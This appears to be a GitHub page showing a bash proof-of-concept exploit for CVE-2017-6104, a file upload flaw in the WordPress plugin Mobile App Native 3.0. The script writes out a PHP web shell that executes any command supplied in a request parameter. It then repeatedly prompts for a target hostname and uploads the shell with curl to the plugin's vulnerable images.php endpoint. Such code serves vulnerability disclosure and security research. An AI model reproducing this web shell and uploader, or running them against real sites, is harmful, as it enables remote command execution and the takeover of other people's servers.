-
Notifications
You must be signed in to change notification settings - Fork 72
/
mobile_plugin_exploit.sh
41 lines (38 loc) · 1.12 KB
/
mobile_plugin_exploit.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
#!/bin/bash
#Exploit for the Wordpress Plugin Mobile App Native 3.0 file upload I posted.
#CVE-2017-6104
#Larry W. Cashdollar,@_larry0
#v1.0
cat > shell.php << -EOF-
<?php
if(isset(\$_REQUEST[‘cmd’])){
echo "<pre>";
\$cmd = (\$_REQUEST[‘cmd’]);
system(\$cmd);
echo "</pre>";
} else { echo "Please supply a command cmd"; }
?>
-EOF-
red='\033[0;31m'
NC='\033[0m' # No Color
while [ true ]; do
echo -e ${red};
echo -e " Mobile App Native 3.0 File Upload PoC Redux $NC";
echo " 3/1/2017";
echo " Larry W. Cashdollar, @_larry0";
echo
echo " CVE-2017-6104";
echo "- Advisory -";
echo "http://www.vapid.dhs.org/advisory.php?v=178";
echo
echo "Ctrl ^C to exit";
echo -n "Enter Target Hostname :";
read target;
echo "[+] Hostname $target";
echo "[+] Exploiting Plugin";
echo
RESULT=`curl -# -F 'file=@shell.php' "http://$target/wp-content/plugins/zen-mobile-app-native/server/images.php"`;
echo "[==========================================================================]"
echo $RESULT
echo "[==========================================================================]"
done